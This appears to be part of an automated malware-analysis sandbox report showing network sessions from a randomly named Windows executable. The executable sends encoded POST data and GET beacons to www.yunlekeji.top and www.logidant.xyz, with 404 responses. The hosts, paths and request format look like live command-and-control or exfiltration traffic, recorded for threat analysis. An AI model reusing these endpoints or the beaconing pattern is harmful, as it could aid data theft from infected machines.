                                                            13192.168.2.549899106.15.109.33806576C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 20, 2024 21:10:00.725912094 CET634OUTPOST /t322/ HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 206
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.yunlekeji.top
                                                            Origin: http://www.yunlekeji.top
                                                            Referer: http://www.yunlekeji.top/t322/
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Data Raw: 73 56 43 38 7a 3d 49 41 33 33 42 74 4d 4d 54 74 55 50 65 48 2f 6d 2b 57 65 79 50 64 6f 37 58 5a 6f 50 43 7a 71 43 6d 78 53 30 5a 79 76 6d 67 45 70 33 46 4b 77 6b 6a 53 4b 6e 6d 74 43 34 4f 56 2b 6c 42 79 49 35 51 53 48 31 6f 7a 49 58 2b 2f 32 61 35 6b 58 61 64 54 58 36 57 66 46 67 76 50 33 78 62 76 62 72 6c 2f 4b 65 46 34 57 6d 45 78 67 2b 43 56 43 44 48 6a 61 6e 49 59 4c 46 38 61 33 31 78 75 6c 62 52 5a 71 53 70 45 45 49 2f 6d 66 43 2f 4d 75 67 55 72 57 55 66 37 49 53 52 36 74 4d 63 36 56 62 37 30 4e 39 65 74 36 37 4a 59 56 59 54 4c 69 46 42 6b 36 49 51 57 4e 79 34 46 70 6a 67 46 65 7a 78 59 6f 64 4e 61 6f 3d
                                                            Data Ascii: sVC8z=IA33BtMMTtUPeH/m+WeyPdo7XZoPCzqCmxS0ZyvmgEp3FKwkjSKnmtC4OV+lByI5QSH1ozIX+/2a5kXadTX6WfFgvP3xbvbrl/KeF4WmExg+CVCDHjanIYLF8a31xulbRZqSpEEI/mfC/MugUrWUf7ISR6tMc6Vb70N9et67JYVYTLiFBk6IQWNy4FpjgFezxYodNao=


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            14192.168.2.549905106.15.109.33806576C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 20, 2024 21:10:03.389355898 CET654OUTPOST /t322/ HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.yunlekeji.top
                                                            Origin: http://www.yunlekeji.top
                                                            Referer: http://www.yunlekeji.top/t322/
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Data Raw: 73 56 43 38 7a 3d 49 41 33 33 42 74 4d 4d 54 74 55 50 64 6e 50 6d 78 52 69 79 4b 39 6f 34 4a 4a 6f 50 49 54 71 47 6d 77 75 30 5a 7a 71 72 67 53 78 33 46 71 67 6b 69 54 4b 6e 68 74 43 34 64 56 2f 76 50 53 49 75 51 53 44 58 6f 32 49 58 2b 2b 57 61 35 6c 48 61 64 67 50 35 58 50 46 69 6e 76 33 33 56 50 62 72 6c 2f 4b 65 46 34 71 63 45 78 6f 2b 43 67 53 44 48 47 6d 67 4a 59 4c 45 37 61 33 31 37 4f 6b 53 52 5a 71 73 70 42 63 75 2f 6c 6e 43 2f 50 36 67 56 2b 69 58 55 37 4a 62 4a 61 73 6a 4e 37 34 2f 37 47 64 33 42 50 76 74 51 35 31 37 66 64 54 76 62 47 79 67 44 32 68 4b 6f 57 68 55 78 31 2f 61 72 37 34 74 54 4e 2b 30 2b 4c 74 42 59 36 36 57 42 44 33 67 76 4a 6a 50 47 56 43 52
                                                            Data Ascii: sVC8z=IA33BtMMTtUPdnPmxRiyK9o4JJoPITqGmwu0ZzqrgSx3FqgkiTKnhtC4dV/vPSIuQSDXo2IX++Wa5lHadgP5XPFinv33VPbrl/KeF4qcExo+CgSDHGmgJYLE7a317OkSRZqspBcu/lnC/P6gV+iXU7JbJasjN74/7Gd3BPvtQ517fdTvbGygD2hKoWhUx1/ar74tTN+0+LtBY66WBD3gvJjPGVCR


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            15192.168.2.549913106.15.109.33806576C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 20, 2024 21:10:06.054174900 CET1671OUTPOST /t322/ HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 1242
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.yunlekeji.top
                                                            Origin: http://www.yunlekeji.top
                                                            Referer: http://www.yunlekeji.top/t322/
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Data Raw: 73 56 43 38 7a 3d 49 41 33 33 42 74 4d 4d 54 74 55 50 64 6e 50 6d 78 52 69 79 4b 39 6f 34 4a 4a 6f 50 49 54 71 47 6d 77 75 30 5a 7a 71 72 67 53 35 33 46 5a 59 6b 6a 77 79 6e 67 74 43 34 47 31 2f 73 50 53 49 76 51 55 72 54 6f 32 4d 74 2b 37 53 61 2f 31 62 61 62 52 50 35 65 50 46 69 34 66 33 79 62 76 61 2f 6c 37 75 61 46 2b 4b 63 45 78 6f 2b 43 6e 71 44 41 54 61 67 45 34 4c 46 38 61 33 70 78 75 6b 36 52 5a 69 38 70 42 70 54 2f 56 48 43 2b 76 71 67 58 49 2b 58 57 62 4a 5a 63 61 73 37 4e 37 30 67 37 47 42 64 42 4f 62 55 51 2b 42 37 61 73 2b 75 42 44 53 67 57 47 5a 4b 6b 30 46 76 6a 79 57 34 6a 64 34 6e 57 4e 69 48 30 4c 4a 55 4e 2f 2b 52 4e 7a 71 6c 34 76 7a 62 41 77 44 63 57 53 7a 5a 30 6e 49 78 45 34 6c 63 52 34 4f 49 48 59 64 56 58 79 63 63 54 36 37 61 51 4b 72 41 6e 51 79 50 49 6a 30 31 6a 36 76 4b 74 44 70 64 4c 73 48 51 41 56 49 70 37 6d 33 31 4f 75 31 32 7a 30 65 48 6f 79 53 38 35 30 59 63 7a 35 4f 38 46 57 51 31 70 36 4a 46 4a 56 2b 7a 6a 30 4e 52 6e 58 35 36 58 4a 6d 32 46 79 52 62 70 41 66 5a [TRUNCATED]
                                                            Data Ascii: sVC8z=IA33BtMMTtUPdnPmxRiyK9o4JJoPITqGmwu0ZzqrgS53FZYkjwyngtC4G1/sPSIvQUrTo2Mt+7Sa/1babRP5ePFi4f3ybva/l7uaF+KcExo+CnqDATagE4LF8a3pxuk6RZi8pBpT/VHC+vqgXI+XWbJZcas7N70g7GBdBObUQ+B7as+uBDSgWGZKk0FvjyW4jd4nWNiH0LJUN/+RNzql4vzbAwDcWSzZ0nIxE4lcR4OIHYdVXyccT67aQKrAnQyPIj01j6vKtDpdLsHQAVIp7m31Ou12z0eHoyS850Ycz5O8FWQ1p6JFJV+zj0NRnX56XJm2FyRbpAfZKgeIv0mVh/bJB2NuDRd+jOCyqL6wuMTYlGiBxN2Cy1HNp4suC8BmnTCvws1xggy+f/xTDGuqm4f5QXMGCOOnVC8Ims3+C0NxPXmuTUYfwQhTubJiBCIf7ZaDkW/yINlD28OuzwxAvsVQKBVdlHAE5TPJbbqrEkMN3rTk7dstjJdc3FVIc9Rc2OHk/rI5yjZJiby29ChRWpkOVb3g86PipRybRweEetmoTyXLl7Utk6HeY8ayJOUXQzLmoLgkAODW6RMVqFyttVx3S7a4PS46eKisrQKB1Wqgd0f/9UeUmxWlbcuhRFASN056u+gUVVF/eGEJfrBgqCxobHl0Ng9Du9zyNRjsNEixb23zXNL675ZTgPorBvG+1BiYl/AZc2RiKmQFV46jc+kp0U1Xtb/SMPCdmzS8LlgubfJbtG4bE9mlsuRRlQBAhJoIf3qZcxaSAnkMMKGZuHVblJ6ikp8d3PxbuzT6K1YQ54ScmrtIcCMwzznAc+sniNevGEr6h5q0zYWpzicfWWnZtHM8uholePAxQHc6gUeoNqQ6CztzcAjpZanoOsLsFYV5uwmk6mG1mFZ8DD/UHgaHpCjQPM62nDDAB03X3vFbG9CaLP/D2+6IYO/I0U/IKJANFPvp60Ob0OK+2Dp4MTz+yG5AiPbPlCtfFyKbxvEI6W [TRUNCATED]


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            16192.168.2.549920106.15.109.33806576C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 20, 2024 21:10:08.716196060 CET370OUTGET /t322/?PPP=FHWL56&sVC8z=FCfXCbowRdQKA3bKzmWhb/MMDIYWCwffvgnpa1jm1l5RPo8GmzCZxrunal2GKioIIi33qnUs85PYplnvRA3XX9RPs5/iUffq0tmKE8rYJBtcI2bhCRGcMbzPlb/C9uxVPg== HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Connection: close
                                                            Host: www.yunlekeji.top
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Nov 20, 2024 21:10:11.431771994 CET1236INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Wed, 20 Nov 2024 20:10:11 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Data Raw: 31 39 66 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e5 8f 91 e7 94 9f e9 94 99 e8 af af 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2f 2a 20 42 61 73 65 20 2a 2f 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 31 36 70 78 20 56 65 72 64 61 6e 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 68 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d [TRUNCATED]
                                                            Data Ascii: 19f2<!DOCTYPE html><html><head> <meta charset="UTF-8"> <title></title> <meta name="robots" content="noindex,nofollow" /> <style> /* Base */ body { color: #333; font: 16px Verdana, "Helvetica Neue", helvetica, Arial, 'Microsoft YaHei', sans-serif; margin: 0; padding: 0 20px 20px; } h1{ margin: 10px 0 0; font-size: 28px; font-weight: 500; line-height: 32px; } h2{ color: #4288ce; font-weight: 400; padding: 6px 0; margin: 6px 0 0; font-size: 18px; border-bottom: 1px solid #eee; } h3{ margin: 12px; font-size: 16px; font-weight: bold; } abbr{ cursor: help; text-decoration: underline; text-decoration-style: dotted; } a{ color [TRUNCATED]
                                                            Nov 20, 2024 21:10:11.431813955 CET1236INData Raw: 65 72 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20
                                                            Data Ascii: er; } a:hover{ text-decoration: underline; } .line-error{ background: #f8cbcb; } .echo table { width: 100%; } .echo pre { padding
                                                            Nov 20, 2024 21:10:11.431827068 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 39 39 39 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 65 78 63 65
                                                            Data Ascii: border-radius: 4px; background: #999; } .exception .source-code{ padding: 6px; border: 1px solid #ddd; background: #f9f9f9; overflow-x: auto; }
                                                            Nov 20, 2024 21:10:11.431871891 CET1236INData Raw: 78 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 22 4c 69 62 65 72 61 74 69 6f 6e 20 4d 6f 6e 6f 22 2c 43 6f 75
                                                            Data Ascii: x; font-size:14px; font-family: Consolas,"Liberation Mono",Courier,Verdana,""; } .exception .trace ol{ margin: 12px; } .exception .trace ol li{ padding: 2p
                                                            Nov 20, 2024 21:10:11.431885958 CET1236INData Raw: 72 64 2d 62 72 65 61 6b 3a 20 62 72 65 61 6b 2d 61 6c 6c 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 65 78 63 65 70 74 69 6f 6e 2d 76 61 72 20 74 61 62 6c 65 20 74 64 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 0a 20 20 20 20 20 20
                                                            Data Ascii: rd-break: break-all; } .exception-var table td:first-child{ width: 28%; font-weight: bold; white-space: nowrap; } .exception-var table td pre{ margin: 0; }
                                                            Nov 20, 2024 21:10:11.431896925 CET663INData Raw: 61 6c 75 65 20 2a 2f 0a 20 20 20 20 20 20 20 20 70 72 65 2e 70 72 65 74 74 79 70 72 69 6e 74 20 2e 64 65 63 2c 20 70 72 65 2e 70 72 65 74 74 79 70 72 69 6e 74 20 2e 76 61 72 20 7b 20 63 6f 6c 6f 72 3a 20 23 36 30 36 20 7d 20 20 2f 2a 20 61 20 64
                                                            Data Ascii: alue */ pre.prettyprint .dec, pre.prettyprint .var { color: #606 } /* a declaration; a variable name */ pre.prettyprint .fun { color: red } /* a function name */ </style></head><body> <div class="echo">


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            17192.168.2.54993845.141.156.114806576C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 20, 2024 21:10:17.119976044 CET631OUTPOST /iuvu/ HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 206
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.logidant.xyz
                                                            Origin: http://www.logidant.xyz
                                                            Referer: http://www.logidant.xyz/iuvu/
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Data Raw: 73 56 43 38 7a 3d 31 45 36 43 37 35 54 5a 70 4a 4e 45 53 37 79 78 4d 4b 56 72 49 48 54 44 44 32 46 41 51 57 75 57 47 2f 63 4c 7a 78 58 6d 50 68 74 56 46 6e 67 58 31 51 54 68 4e 35 45 49 53 63 66 75 4a 45 2b 30 52 67 66 74 61 6a 43 39 68 39 4a 75 30 74 6c 34 76 73 47 4a 52 56 62 39 2f 56 53 53 2b 34 48 41 6e 35 77 6a 62 36 74 76 42 4a 6a 59 2b 75 77 4d 54 77 68 58 73 77 35 34 47 2b 47 7a 37 45 79 7a 32 69 75 4a 62 31 6a 70 42 42 64 6c 57 50 4a 65 74 71 53 36 53 73 34 68 74 5a 55 6f 39 66 69 69 33 67 4f 72 55 41 43 38 4b 44 49 77 55 55 67 6f 7a 32 74 44 39 57 2f 32 69 69 4a 77 37 77 62 39 6b 4c 47 42 56 48 45 3d
                                                            Data Ascii: sVC8z=1E6C75TZpJNES7yxMKVrIHTDD2FAQWuWG/cLzxXmPhtVFngX1QThN5EIScfuJE+0RgftajC9h9Ju0tl4vsGJRVb9/VSS+4HAn5wjb6tvBJjY+uwMTwhXsw54G+Gz7Eyz2iuJb1jpBBdlWPJetqS6Ss4htZUo9fii3gOrUAC8KDIwUUgoz2tD9W/2iiJw7wb9kLGBVHE=
                                                            Nov 20, 2024 21:10:18.516494989 CET691INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Wed, 20 Nov 2024 20:10:18 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 548
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            18192.168.2.54994545.141.156.114806576C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 20, 2024 21:10:19.784112930 CET651OUTPOST /iuvu/ HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.logidant.xyz
                                                            Origin: http://www.logidant.xyz
                                                            Referer: http://www.logidant.xyz/iuvu/
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Data Raw: 73 56 43 38 7a 3d 31 45 36 43 37 35 54 5a 70 4a 4e 45 53 62 43 78 4c 74 68 72 42 48 54 63 4e 57 46 41 65 32 76 66 47 2f 59 4c 7a 7a 36 37 4f 54 35 56 47 46 6f 58 30 53 72 68 41 5a 45 49 4b 4d 66 72 55 55 2b 39 52 67 54 66 61 6d 36 39 68 38 74 75 30 6f 68 34 76 62 79 4b 58 46 62 2f 33 31 53 55 77 59 48 41 6e 35 77 6a 62 36 34 41 42 4a 37 59 2b 2b 41 4d 53 54 35 59 6b 51 35 35 42 2b 47 7a 2f 45 79 33 32 69 75 52 62 33 62 54 42 48 5a 6c 57 4f 35 65 74 34 71 35 62 73 34 76 77 70 56 64 37 61 50 31 75 7a 2f 71 58 67 7a 75 63 43 63 4b 59 43 52 43 70 55 6c 72 75 32 54 4f 79 78 42 48 71 41 36 55 2b 6f 57 78 4c 51 51 4b 59 63 42 75 48 36 76 61 4a 67 72 41 6b 36 4b 61 50 59 46 55
                                                            Data Ascii: sVC8z=1E6C75TZpJNESbCxLthrBHTcNWFAe2vfG/YLzz67OT5VGFoX0SrhAZEIKMfrUU+9RgTfam69h8tu0oh4vbyKXFb/31SUwYHAn5wjb64ABJ7Y++AMST5YkQ55B+Gz/Ey32iuRb3bTBHZlWO5et4q5bs4vwpVd7aP1uz/qXgzucCcKYCRCpUlru2TOyxBHqA6U+oWxLQQKYcBuH6vaJgrAk6KaPYFU
                                                            Nov 20, 2024 21:10:21.084203005 CET691INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Wed, 20 Nov 2024 20:10:20 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 548
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            19192.168.2.54995245.141.156.114806576C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 20, 2024 21:10:22.459631920 CET1668OUTPOST /iuvu/ HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 1242
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.logidant.xyz
                                                            Origin: http://www.logidant.xyz
                                                            Referer: http://www.logidant.xyz/iuvu/
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Data Raw: 73 56 43 38 7a 3d 31 45 36 43 37 35 54 5a 70 4a 4e 45 53 62 43 78 4c 74 68 72 42 48 54 63 4e 57 46 41 65 32 76 66 47 2f 59 4c 7a 7a 36 37 4f 53 42 56 47 32 77 58 30 7a 72 68 42 5a 45 49 55 63 66 71 55 55 2f 2f 52 67 4c 62 61 6d 6d 44 68 2b 6c 75 79 4b 70 34 6e 4b 79 4b 65 46 62 2f 6f 6c 53 52 2b 34 48 5a 6e 39 63 6e 62 36 6f 41 42 4a 37 59 2b 34 6b 4d 47 77 68 59 69 51 35 34 47 2b 48 79 37 45 79 66 32 69 32 42 62 78 48 44 42 58 35 6c 58 74 42 65 76 4c 53 35 48 38 35 4a 67 35 56 46 37 61 4b 79 75 7a 69 52 58 67 32 37 63 45 73 4b 59 44 30 42 35 46 42 7a 7a 48 4c 7a 78 6a 35 52 32 31 69 69 38 4a 71 32 4e 6a 38 75 51 59 5a 2b 48 63 50 34 50 78 69 38 6d 75 4f 7a 47 4e 6f 46 5a 69 32 46 55 30 45 36 30 43 6c 39 54 6c 54 4d 35 4b 2b 2b 56 50 78 65 61 6a 39 53 34 6b 54 4b 69 6e 6b 4b 6a 50 6e 6e 6f 4f 53 2f 6e 30 53 52 4b 37 62 61 30 43 62 69 58 41 64 34 62 34 76 71 31 47 4e 6a 74 49 32 77 5a 69 38 74 6c 39 50 2b 30 77 33 4f 76 70 4b 78 6d 63 69 6b 42 31 7a 76 32 2f 74 54 31 38 6e 66 41 61 4a 49 6b 4a 51 6f [TRUNCATED]
                                                            Data Ascii: sVC8z=1E6C75TZpJNESbCxLthrBHTcNWFAe2vfG/YLzz67OSBVG2wX0zrhBZEIUcfqUU//RgLbammDh+luyKp4nKyKeFb/olSR+4HZn9cnb6oABJ7Y+4kMGwhYiQ54G+Hy7Eyf2i2BbxHDBX5lXtBevLS5H85Jg5VF7aKyuziRXg27cEsKYD0B5FBzzHLzxj5R21ii8Jq2Nj8uQYZ+HcP4Pxi8muOzGNoFZi2FU0E60Cl9TlTM5K++VPxeaj9S4kTKinkKjPnnoOS/n0SRK7ba0CbiXAd4b4vq1GNjtI2wZi8tl9P+0w3OvpKxmcikB1zv2/tT18nfAaJIkJQo0xywPUAF2J+bw3aSn8/suMT4v+H7JbiywjYUN8COYgT2FbUMC+/uCwYPynE7p34GXEa9Uuz0PPxr1uUAXoO6wCKN9D0s5FP6xYuBTEjZlbdnyEctfqEQz+8hoso2aE+hhG0/Cy2rdoEQ+nO9gSW5LHiPkDk07kyLh3pu188dc7EEulV8r5PbDu/XUVAWVXd02qoQktx0O3PY2QjSrK1a41XDvioddg+BpTkFjY+v+DzVJI50lB/dG7RBj1jFfCD1hpU8Bod7dv7TRvd6RJEDssDs3RXEixf9pTIMDKSx/ttdvtuktqdkyqr0qZzeIh50D+rI/W3QLpAzODKlXdZ/XaMTc+U0nAcvYOnznxJbmyk+6t0zZhbbW9Wl/8u6vSqEP3QxBkgt4jRrVAJyJdhCidSHxWqhTdhNKxtqt4vm/ghI5D5AZFnrzFKmNtsbQ4RCpVAO7jfOleXnNf9mIcYIIXCCFx4k8nHUfzSczYcurpieLNCvROd2mmLjoU8FfILO3pz4M1+zOZzcCY5M6bC8q0BsMsS2M+ZRqgX4EPJUkPhRDqL7xJ45hdLs28xhtC6mQmoESlMImPp5dPxj3bp+KnH+6S9X4Me+cHdF7mrXCMSD+mKiLrdy9yWLBHzrUa+msSvMhDe7owypIfkli1ruLC8GvPaeLWVFMT [TRUNCATED]
                                                            Nov 20, 2024 21:10:23.802182913 CET691INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Wed, 20 Nov 2024 20:10:23 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 548
                                                            Connection: close
